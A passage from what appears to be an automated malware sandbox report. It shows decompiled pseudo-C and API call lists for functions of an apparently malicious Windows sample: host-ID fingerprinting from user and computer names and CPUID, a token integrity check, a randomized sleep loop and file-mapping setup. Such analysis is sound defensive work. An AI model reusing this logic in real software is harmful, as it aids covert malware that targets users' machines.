                        					if(GetLastError() == 0xb7) {
                        						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                        						if(_t21 == 0) {
                        							_t28 = GetLastError();
                        							if(_t28 != 0) {
                        								goto L6;
                        							}
                        						} else {
                        							 *_a4 = _t30;
                        							 *_a8 = _t21;
                        							_t28 = 0;
                        						}
                        					} else {
                        						_t28 = 2;
                        						L6:
                        						CloseHandle(_t30);
                        					}
                        				}
                        				return _t28;
                        			}

                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04772DF9,?,00000001,?), ref: 047757B9
                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047757CF
                        • _snwprintf.NTDLL ref: 047757F4
                        • CreateFileMappingW.KERNELBASE(000000FF,0477A2D4,00000004,00000000,00001000,?), ref: 04775810
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04772DF9,?), ref: 04775822
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04775839
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04772DF9), ref: 0477585A
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04772DF9,?), ref: 04775862
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                        • String ID:
                        • API String ID: 1814172918-0
                        • Opcode ID: aa8967cf6f4dde76c02ebe7914d4d2b72d9fa87f563f34c36f05b00a84cf9cb9
                        • Instruction ID: 6b523f4d56b07308ce9bdd57cf6f62ed312335d387754ae27d97e6ac8d6923eb
                        • Opcode Fuzzy Hash: aa8967cf6f4dde76c02ebe7914d4d2b72d9fa87f563f34c36f05b00a84cf9cb9
                        • Instruction Fuzzy Hash: 7721A2B2A01204FBEB119B64CC05FDD77B9EB84754FA44525FB05EB2C1EA78B905CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E04773946(char __eax, signed int* __esi) {
                        				long _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v28;
                        				long _t34;
                        				signed int _t39;
                        				long _t50;
                        				char _t59;
                        				intOrPtr _t61;
                        				void* _t62;
                        				void* _t63;
                        				signed int* _t64;
                        				char _t65;
                        				intOrPtr* _t67;
                        				void* _t68;
                        				signed int* _t69;
                        
                        				_t69 = __esi;
                        				_t65 = __eax;
                        				_v8 = 0;
                        				_v12 = __eax;
                        				if(__eax == 0) {
                        					_t59 =  *0x477a2c8; // 0xbd092303
                        					_v12 = _t59;
                        				}
                        				_t64 = _t69;
                        				E0477354E( &_v12, _t64);
                        				if(_t65 != 0) {
                        					 *_t69 =  *_t69 ^  *0x477a2cc ^ 0x4c0ca0ae;
                        				} else {
                        					GetUserNameW(0,  &_v8); // executed
                        					_t50 = _v8;
                        					if(_t50 != 0) {
                        						_t62 = RtlAllocateHeap( *0x477a290, 0, _t50 + _t50);
                        						if(_t62 != 0) {
                        							if(GetUserNameW(_t62,  &_v8) != 0) {
                        								_t63 = _t62;
                        								 *_t69 =  *_t69 ^ E04773F12(_v8 + _v8, _t63);
                        							}
                        							HeapFree( *0x477a290, 0, _t62);
                        						}
                        					}
                        				}
                        				_t61 = __imp__;
                        				_v8 = _v8 & 0x00000000;
                        				GetComputerNameW(0,  &_v8);
                        				_t34 = _v8;
                        				if(_t34 != 0) {
                        					_t68 = RtlAllocateHeap( *0x477a290, 0, _t34 + _t34);
                        					if(_t68 != 0) {
                        						if(GetComputerNameW(_t68,  &_v8) != 0) {
                        							_t63 = _t68;
                        							_t69[3] = _t69[3] ^ E04773F12(_v8 + _v8, _t63);
                        						}
                        						HeapFree( *0x477a290, 0, _t68);
                        					}
                        				}
                        				asm("cpuid");
                        				_t67 =  &_v28;
                        				 *_t67 = 1;
                        				 *((intOrPtr*)(_t67 + 4)) = _t61;
                        				 *(_t67 + 8) = _t63;
                        				 *(_t67 + 0xc) = _t64;
                        				_t39 = _v16 ^ _v20 ^ _v28;
                        				_t69[1] = _t69[1] ^ _t39;
                        				return _t39;
                        			}

                        APIs
                        • GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 0477397D
                        • RtlAllocateHeap.NTDLL(00000000,04772F3F), ref: 04773994
                        • GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 047739A1
                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04772F3F,?,?,?,?,?,047744F9,?,00000001), ref: 047739C2
                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047739E9
                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047739FD
                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04773A0A
                        • HeapFree.KERNEL32(00000000,00000000), ref: 04773A28
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: HeapName$AllocateComputerFreeUser
                        • String ID:
                        • API String ID: 3239747167-0
                        • Opcode ID: 4cd4c370e130cc7499bbe963182ec8ddcf9fab3869dacc3c7de5b246dd0a786d
                        • Instruction ID: 69f74d6f513640bc264cf4155b6e18caa129bb3cc1cffd30083e6ac64ce95938
                        • Opcode Fuzzy Hash: 4cd4c370e130cc7499bbe963182ec8ddcf9fab3869dacc3c7de5b246dd0a786d
                        • Instruction Fuzzy Hash: C8311C71A10209EFEB11DFA9DD85EAEB7F9EB84714F908429E905E3211D734EE04EB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E04772D63(signed int __edx) {
                        				signed int _v8;
                        				long _v12;
                        				signed int _v16;
                        				long _v20;
                        				void* _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				char _v40;
                        				void* __edi;
                        				void* __esi;
                        				void* _t27;
                        				long _t28;
                        				long _t31;
                        				intOrPtr _t32;
                        				void* _t36;
                        				signed int _t37;
                        				intOrPtr _t38;
                        				void* _t39;
                        				CHAR* _t42;
                        				long _t48;
                        				long _t49;
                        				void* _t54;
                        				void* _t56;
                        				intOrPtr _t64;
                        				void* _t67;
                        				long _t71;
                        				void* _t72;
                        				signed char _t74;
                        				intOrPtr _t76;
                        				signed int _t77;
                        				long _t82;
                        				long _t84;
                        				CHAR* _t87;
                        				void* _t88;
                        
                        				_t79 = __edx;
                        				_v16 = 0;
                        				_v8 = 0;
                        				_v12 = 0;
                        				_t27 = E04775901();
                        				if(_t27 != 0) {
                        					_t77 =  *0x477a2b4; // 0x4000000a
                        					_t73 = (_t77 & 0xf0000000) + _t27;
                        					 *0x477a2b4 = (_t77 & 0xf0000000) + _t27;
                        				}
                        				_t28 =  *0x477a14c(0, 2); // executed
                        				_v20 = _t28;
                        				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                        					_t31 = E04774097( &_v8,  &_v16); // executed
                        					_push(0);
                        					_t84 = _t31;
                        					_t32 =  *0x477a2d0; // 0x96d5a8
                        					_push(0x477a2d8);
                        					_push(1);
                        					_t7 = _t32 + 0x477b5bc; // 0x4d283a53
                        					 *0x477a2d4 = 0xc;
                        					 *0x477a2dc = 0;
                        					L04775EC2();
                        					_t36 = E047757AD(_t79,  &_v24,  &_v12); // executed
                        					if(_t36 == 0) {
                        						CloseHandle(_v24);
                        					}
                        					if(_t84 != 5) {
                        						_t37 = _v16;
                        						__eflags = _t37;
                        						if(_t37 != 0) {
                        							E04773946(_t37 ^ 0xe8fa7dd7,  &_v40);
                        							_t87 = E04775C4E(0x27);
                        							__eflags = _t87;
                        							if(_t87 != 0) {
                        								asm("bswap eax");
                        								asm("bswap eax");
                        								asm("bswap eax");
                        								asm("bswap eax");
                        								_t64 =  *0x477a2d0; // 0x96d5a8
                        								_t18 = _t64 + 0x477b916; // 0x78383025
                        								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                        								_t88 = _t88 + 0x18;
                        							}
                        							 *0x477a328 = _t87;
                        						}
                        						_t38 = E04772304();
                        						 *0x477a2c8 =  *0x477a2c8 ^ 0xe8fa7dd7;
                        						 *0x477a318 = _t38;
                        						_t39 = E04775C4E(0x60);
                        						__eflags = _t39;
                        						 *0x477a37c = _t39;
                        						if(_t39 == 0) {
                        							_t84 = 8;
                        						} else {
                        							memset(_t39, 0, 0x60);
                        							_t54 =  *0x477a37c; // 0x50e9630
                        							_t88 = _t88 + 0xc;
                        							__imp__(_t54 + 0x40);
                        							_t56 =  *0x477a37c; // 0x50e9630
                        							 *_t56 = 0x477b882;
                        							_t84 = 0;
                        						}
                        						__eflags = _t84;
                        						if(_t84 == 0) {
                        							_t42 = RtlAllocateHeap( *0x477a290, _t84, 0x52);
                        							__eflags = _t42;
                        							 *0x477a310 = _t42;
                        							if(_t42 == 0) {
                        								_t84 = 8;
                        							} else {
                        								_t74 =  *0x477a2b4; // 0x4000000a
                        								_t79 = _t74 & 0x000000ff;
                        								_t76 =  *0x477a2d0; // 0x96d5a8
                        								_t19 = _t76 + 0x477b212; // 0x697a6f4d
                        								_t73 = _t19;
                        								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x47792c7);
                        							}
                        							__eflags = _t84;
                        							if(_t84 == 0) {
                        								asm("sbb eax, eax");
                        								E04773946( ~_v8 &  *0x477a2c8, 0x477a00c); // executed
                        								_t84 = E0477374B(_t73);
                        								__eflags = _t84;
                        								if(_t84 != 0) {
                        									goto L31;
                        								}
                        								_t48 = E04773E8F(_t73); // executed
                        								__eflags = _t48;
                        								if(_t48 != 0) {
                        									__eflags = _v8;
                        									_t82 = _v12;
                        									if(_v8 != 0) {
                        										L30:
                        										_t49 = E04771B47(_t79, _t82, _v8); // executed
                        										_t84 = _t49;
                        										goto L31;
                        									}
                        									__eflags = _t82;
                        									if(__eflags == 0) {
                        										goto L31;
                        									}
                        									_t23 = _t82 + 4; // 0x5
                        									_t84 = E04775D26(__eflags, _t23);
                        									__eflags = _t84;
                        									if(_t84 == 0) {
                        										goto L31;
                        									}
                        									goto L30;
                        								}
                        								_t84 = 8;
                        							}
                        						}
                        					} else {
                        						_t71 = _v12;
                        						if(_t71 == 0) {
                        							L31:
                        							if(_v20 == 0 || _v20 == 1) {
                        								 *0x477a150();
                        							}
                        							goto L35;
                        						}
                        						_t72 = _t71 + 4;
                        						do {
                        							_push(1);
                        							_push(_t72);
                        							_t67 = 5;
                        						} while (E047763CD(_t67, 0) == 0x4c7);
                        					}
                        					goto L31;
                        				} else {
                        					_t84 = _t28;
                        					L35:
                        					return _t84;
                        				}
                        			}

                        APIs
                          • Part of subcall function 04775901: GetModuleHandleA.KERNEL32(4C44544E,00000000,04772D7C,00000000,00000000,00000000,?,?,?,?,?,047744F9,?,00000001), ref: 04775910
                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0477A2D8,00000000), ref: 04772DE7
                        • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,047744F9,?,00000001), ref: 04772E00
                        • wsprintfA.USER32 ref: 04772E80
                        • memset.NTDLL ref: 04772EB0
                        • RtlInitializeCriticalSection.NTDLL(050E95F0), ref: 04772EC1
                        • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 04772EEA
                        • wsprintfA.USER32 ref: 04772F1A
                          • Part of subcall function 04773946: GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 0477397D
                          • Part of subcall function 04773946: RtlAllocateHeap.NTDLL(00000000,04772F3F), ref: 04773994
                          • Part of subcall function 04773946: GetUserNameW.ADVAPI32(00000000,04772F3F), ref: 047739A1
                          • Part of subcall function 04773946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04772F3F,?,?,?,?,?,047744F9,?,00000001), ref: 047739C2
                          • Part of subcall function 04773946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 047739E9
                          • Part of subcall function 04773946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047739FD
                          • Part of subcall function 04773946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04773A0A
                          • Part of subcall function 04773946: HeapFree.KERNEL32(00000000,00000000), ref: 04773A28
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                        • String ID:
                        • API String ID: 2910951584-0
                        • Opcode ID: 7c0c0db7ebbf7b38b90832e193bf60661e2f81643ca2f6f55f079c79a00f4b53
                        • Instruction ID: 1fe393da79293eaca0e92c0547078966019bbe1ba951b1e80bb52020f6be1596
                        • Opcode Fuzzy Hash: 7c0c0db7ebbf7b38b90832e193bf60661e2f81643ca2f6f55f079c79a00f4b53
                        • Instruction Fuzzy Hash: 3651B0B1A00215ABFF21EFA4D888BAE77B8EB44714FD48595E914E7341E778BD40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04771041(long* _a4) {
                        				long _v8;
                        				void* _v12;
                        				void _v16;
                        				long _v20;
                        				int _t33;
                        				void* _t46;
                        
                        				_v16 = 1;
                        				_v20 = 0x2000;
                        				if( *0x477a2b4 > 5) {
                        					_v16 = 0;
                        					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                        						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                        						_v8 = 0;
                        						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                        						if(_v8 != 0) {
                        							_t46 = E04775C4E(_v8);
                        							if(_t46 != 0) {
                        								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                        								if(_t33 != 0) {
                        									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                        								}
                        								E04772A03(_t46);
                        							}
                        						}
                        						CloseHandle(_v12);
                        					}
                        				}
                        				 *_a4 = _v20;
                        				return _v16;
                        			}

                        APIs
                        • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04771073
                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 04771093
                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 047710A3
                        • CloseHandle.KERNEL32(00000000), ref: 047710F3
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 047710C6
                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047710CE
                        • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047710DE
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                        • String ID:
                        • API String ID: 1295030180-0
                        • Opcode ID: a2e305e46c9f0598848046c0cd256ce6dbdd538bf8b58b40995ca7f331f87028
                        • Instruction ID: 1d4843d0c1c589207e001aa7ce59cd6f35a54e36179255e0b74d4e98f611bb19
                        • Opcode Fuzzy Hash: a2e305e46c9f0598848046c0cd256ce6dbdd538bf8b58b40995ca7f331f87028
                        • Instruction Fuzzy Hash: 48214A7590025EFFEF109F90CC84EEEBBB9EB08304F8044A5EA10A6250DB755A44EB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E04774430(signed int __edx, intOrPtr _a4) {
                        				struct _FILETIME _v12;
                        				char _v32;
                        				long _v40;
                        				void* _t14;
                        				void* _t16;
                        				int _t18;
                        				signed int _t20;
                        				void* _t22;
                        				signed int _t23;
                        				intOrPtr _t25;
                        				unsigned int _t29;
                        				signed int _t33;
                        				signed int _t40;
                        
                        				_t33 = __edx;
                        				_t14 = HeapCreate(0, 0x400000, 0); // executed
                        				 *0x477a290 = _t14;
                        				if(_t14 != 0) {
                        					 *0x477a180 = GetTickCount();
                        					_t16 = E04772A18(_a4);
                        					if(_t16 != 0) {
                        						L10:
                        						return _t16;
                        					} else {
                        						goto L3;
                        					}
                        					do {
                        						L3:
                        						GetSystemTimeAsFileTime( &_v12);
                        						_t18 = SwitchToThread();
                        						_t29 = _v12.dwHighDateTime;
                        						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                        						_push(0);
                        						_push(9);
                        						_push(_t29 >> 7);
                        						_push(_t20);
                        						L047780B2();
                        						_t40 = _t18 + _t20;
                        						_t22 = E04773F5D(_a4, _t40);
                        						_t23 = 2;
                        						Sleep(_t23 << _t40); // executed
                        					} while (_t22 == 1);
                        					_t25 =  *0x477a2ac; // 0x2ec
                        					_v32 = 0;
                        					if(_t25 != 0) {
                        						__imp__(_t25,  &_v32);
                        						if(_t25 == 0) {
                        							_v40 = 0;
                        						}
                        						if(_v40 != 0) {
                        							 *0x477a2b8 = 1; // executed
                        						}
                        					}
                        					_t16 = E04772D63(_t33); // executed
                        					goto L10;
                        				}
                        				_t16 = 8;
                        				goto L10;
                        			}

                        APIs
                        • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04774445
                        • GetTickCount.KERNEL32 ref: 0477445C
                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 0477447C
                        • SwitchToThread.KERNEL32(?,00000001), ref: 04774482
                        • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0477449E
                        • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 047744B8
                        • IsWow64Process.KERNEL32(000002EC,?,?,00000001), ref: 047744D6
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                        • String ID:
                        • API String ID: 3690864001-0
                        • Opcode ID: 57921610525a5a69e584719d6a1251edf2aa038da230b0cae50a80836b0d2152
                        • Instruction ID: 58ee6124e4a19ac53e4bbdb14f425aa3e102ea0741fbc7f2025034890be1a9f9
                        • Opcode Fuzzy Hash: 57921610525a5a69e584719d6a1251edf2aa038da230b0cae50a80836b0d2152
                        • Instruction Fuzzy Hash: 0B2178F2644305AFEB109F64DC89AAE77E8F744254F848929F655C2240E778AC44DB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E04775AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _t9;
                        				intOrPtr _t13;
                        				char* _t19;
                        				char* _t28;
                        				void* _t33;
                        				void* _t34;
                        				char* _t36;
                        				void* _t38;
                        				intOrPtr* _t39;
                        				char* _t40;
                        				char* _t42;
                        				char* _t43;
                        
                        				_t34 = __edx;
                        				_push(__ecx);
                        				_t9 =  *0x477a2d0; // 0x96d5a8
                        				_t1 = _t9 + 0x477b61b; // 0x253d7325
                        				_t36 = 0;
                        				_t28 = E047747BA(__ecx, _t1);
                        				if(_t28 != 0) {
                        					_t39 = __imp__;
                        					_t13 =  *_t39(_t28, _t38);
                        					_v8 = _t13;
                        					_t6 =  *_t39(_a4) + 1; // 0x50e9631
                        					_t40 = E04775C4E(_v8 + _t6);
                        					if(_t40 != 0) {
                        						strcpy(_t40, _t28);
                        						_pop(_t33);
                        						__imp__(_t40, _a4);
                        						_t19 = E04771AF1(_t33, _t34, _t40, _a8); // executed
                        						_t36 = _t19;
                        						E04772A03(_t40);
                        						_t42 = E0477332F(StrTrimA(_t36, "="), _t36);
                        						if(_t42 != 0) {
                        							E04772A03(_t36);
                        							_t36 = _t42;
                        						}
                        						_t43 = E04774138(_t36, _t33);
                        						if(_t43 != 0) {
                        							E04772A03(_t36);
                        							_t36 = _t43;
                        						}
                        					}
                        					E04772A03(_t28);
                        				}
                        				return _t36;
                        			}

                        APIs
                          • Part of subcall function 047747BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04775AFC,253D7325,00000000,00000000,?,00000000,04776301), ref: 04774821
                          • Part of subcall function 047747BA: sprintf.NTDLL ref: 04774842
                        • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B0E
                        • lstrlen.KERNEL32(00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B16
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • strcpy.NTDLL ref: 04775B2D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 04775B38
                          • Part of subcall function 04771AF1: lstrlen.KERNEL32(00000000,00000000,04776301,00000000,?,04775B47,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04771B02
                          • Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04775B55
                          • Part of subcall function 0477332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04775B61,00000000,?,00000000,04776301,00000000,050E9630), ref: 04773339
                          • Part of subcall function 0477332F: _snprintf.NTDLL ref: 04773397
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                        • String ID: =
                        • API String ID: 2864389247-1428090586
                        • Opcode ID: 7ee34c1e63e7d585d911ee0e502a0d1979857d789dfbc00dfe8607b987de17cb
                        • Instruction ID: 83f879db3c4a5c5af7c8c9fb91708b355d5481aa9bfedba1488d3ae314007924
                        • Opcode Fuzzy Hash: 7ee34c1e63e7d585d911ee0e502a0d1979857d789dfbc00dfe8607b987de17cb
                        • Instruction Fuzzy Hash: 89115173D011257B6F2277749C88CAE379D9F8566838A4555F90497301DE78FD0297E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C53E714
                          • Part of subcall function 6C5427F1: _setlocale.LIBCMT ref: 6C54280A
                        • _free.LIBCMT ref: 6C53E724
                          • Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
                          • Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD
                        • _free.LIBCMT ref: 6C53E73B
                        • _free.LIBCMT ref: 6C53E752
                        • _free.LIBCMT ref: 6C53E769
                        • _free.LIBCMT ref: 6C53E780
                        • _free.LIBCMT ref: 6C53E797
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                        • String ID:
                        • API String ID: 3515823920-0
                        • Opcode ID: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
                        • Instruction ID: 87ed361d010c702af45d974c8f4297a791f0413c04180c94fd8c94ab921fac55
                        • Opcode Fuzzy Hash: 6f91f8754ef23c16e43dc6d4917a315c775c50e139badb3c96fa59e59bb81cd4
                        • Instruction Fuzzy Hash: 48011BF0A01B509BFA20CA359C4CB5777E85F10748F008928D85ACBB40F77AF90C8B96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(00000000), ref: 047716B2
                        • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 04771734
                        • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04771773
                        • SysFreeString.OLEAUT32(00000000), ref: 04771795
                          • Part of subcall function 047713B4: SysAllocString.OLEAUT32(047792D0), ref: 04771404
                        • SafeArrayDestroy.OLEAUT32(?), ref: 047717E9
                        • SysFreeString.OLEAUT32(?), ref: 047717F7
                          • Part of subcall function 04775872: Sleep.KERNELBASE(000001F4), ref: 047758BA
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                        • String ID:
                        • API String ID: 2118684380-0
                        • Opcode ID: b4ae6b94d23ebbbddaf9ec27652ebb7b4bd9fb53003058494eaba7caf7960597
                        • Instruction ID: 2ed787226ca415104fe687ab88c78f2736c995a5c6bc5468c703506305343141
                        • Opcode Fuzzy Hash: b4ae6b94d23ebbbddaf9ec27652ebb7b4bd9fb53003058494eaba7caf7960597
                        • Instruction Fuzzy Hash: 1951107690020DAFDF10DFA4C8888EEB7BAFF88350B958868E545EB310D735AD45CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(80000002), ref: 047734A3
                        • SysAllocString.OLEAUT32(047720DE), ref: 047734E6
                        • SysFreeString.OLEAUT32(00000000), ref: 047734FA
                        • SysFreeString.OLEAUT32(00000000), ref: 04773508
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$AllocFree
                        • String ID:
                        • API String ID: 344208780-0
                        • Opcode ID: 7c0db3dbf248f1c0478a43e6f8c8102d2b3beb94444eaacad1775246e06de11b
                        • Instruction ID: 23a7868cca8a30786c062377da147b11fbe2688b5b4d9366adc42b4f49a1a295
                        • Opcode Fuzzy Hash: 7c0db3dbf248f1c0478a43e6f8c8102d2b3beb94444eaacad1775246e06de11b
                        • Instruction Fuzzy Hash: BF31FEB2900149EFCB05DFA9D4C48EE7BB5FF48344B50842EF906A7210E735AA45DFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E04775988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                        				intOrPtr _v8;
                        				void* _v12;
                        				void* _v16;
                        				intOrPtr _t26;
                        				intOrPtr* _t28;
                        				intOrPtr _t31;
                        				intOrPtr* _t32;
                        				void* _t39;
                        				int _t46;
                        				intOrPtr* _t47;
                        				int _t48;
                        
                        				_t47 = __eax;
                        				_push( &_v12);
                        				_push(__eax);
                        				_t39 = 0;
